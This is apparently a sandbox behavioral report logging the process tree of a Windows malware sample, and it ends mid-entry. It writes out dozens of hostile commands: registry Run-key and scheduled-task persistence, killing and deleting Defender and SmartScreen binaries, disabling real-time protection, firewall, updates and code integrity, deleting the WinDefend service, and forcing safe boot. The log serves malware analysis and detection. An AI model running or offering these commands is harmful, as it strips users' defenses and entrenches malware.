  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe" /rl LIMITED /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthSystray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im NisSrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MsMpEng.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SmartScreen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
  2⤵
  PID:2072
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im mrt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4388
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
  2⤵
  PID:3280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
  2⤵
  PID:5200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
  2⤵
  PID:2160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
  2⤵
  PID:4200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:1420
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
  2⤵
  PID:1624
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:5064
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:4704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
  2⤵
  PID:4568
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:6108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:1680
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  2⤵
  PID:4624
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:5336
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:1328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1272
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:1080
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:1496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:3108
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:4392
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:776
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
  2⤵
  PID:1096
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
    3⤵
    PID:3868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
  2⤵
  PID:6048
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {current} safeboot minimal
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5688
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:5844
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:4864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:6092
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:2592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1068
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:4368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
  2⤵
  PID:4424
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    3⤵
    PID:4416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6108
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
  2⤵
  PID:5436
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:4988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
  2⤵
  PID:1408
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OneDrive.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4636
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4592
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      "C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-814918696-1585701690-3140955116-1000
      4⤵
      System Location Discovery: System Language Discovery
      PID:5168
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /peruser /childprocess /enableOMCTelemetry /enableExtractCabV2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:4788
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
    3⤵
    PID:5904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:392
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:2960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:1360
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:4000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:5824
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:4048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:1552
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:4104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:5476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
  2⤵
  PID:5864
- - C:\Windows\system32\sc.exe
    sc delete WinDefend
    3⤵
    - Launches sc.exe
    PID:2376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:1716
- - C:\Windows\system32\reg.exe
